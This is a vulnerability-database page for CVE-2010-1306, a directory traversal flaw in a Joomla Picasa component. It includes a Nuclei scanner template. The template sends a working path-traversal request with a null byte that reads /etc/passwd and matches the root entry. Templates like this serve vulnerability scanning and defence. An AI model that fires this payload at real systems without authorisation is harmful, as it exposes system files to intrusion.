Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2010-1306
HistoryAug 25, 2021 - 8:05 a.m.

Joomla! Component Picasa 2.0 - Local File Inclusion

2021-08-2508:05:31
ProjectDiscovery
github.com
4
cve2010
joomla
local file inclusion

CVSS2

7.5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

AI Score

6.5

Confidence

Low

EPSS

0.012

Percentile

85.6%

A directory traversal vulnerability in the Picasa (com_joomlapicasa2) component 2.0 and 2.0.5 for Joomla! allows remote attackers to read arbitrary local files via a … (dot dot) in the controller parameter to index.php.

id: CVE-2010-1306

info:
  name: Joomla! Component Picasa 2.0 - Local File Inclusion
  author: daffainfo
  severity: high
  description: A directory traversal vulnerability in the Picasa (com_joomlapicasa2) component 2.0 and 2.0.5 for Joomla! allows remote attackers to read arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files.
  remediation: Upgrade to the latest version to mitigate this vulnerability.
  reference:
    - https://www.exploit-db.com/exploits/12058
    - https://nvd.nist.gov/vuln/detail/CVE-2010-1306
    - https://exchange.xforce.ibmcloud.com/vulnerabilities/57508
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P
    cvss-score: 7.5
    cve-id: CVE-2010-1306
    cwe-id: CWE-22
    epss-score: 0.01242
    epss-percentile: 0.85468
    cpe: cpe:2.3:a:roberto_aloi:com_joomlapicasa2:2.0.0:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: roberto_aloi
    product: com_joomlapicasa2
  tags: cve,cve2010,joomla,lfi,edb,roberto_aloi

http:
  - method: GET
    path:
      - "{{BaseURL}}/index.php?option=com_joomlapicasa2&controller=../../../../../etc/passwd%00"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100b69a0ddb75fe5a6e5e5da5c2cffef27949528448bd76ee69133c23453fe51e5e022100f835ef8902e4b818d7e38d065ff2246d9bad77fd846cd678376cc369edc01934:922c64590222798bb761d5b6d8e72950

CVSS2

7.5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

AI Score

6.5

Confidence

Low

EPSS

0.012

Percentile

85.6%

Related for NUCLEI:CVE-2010-1306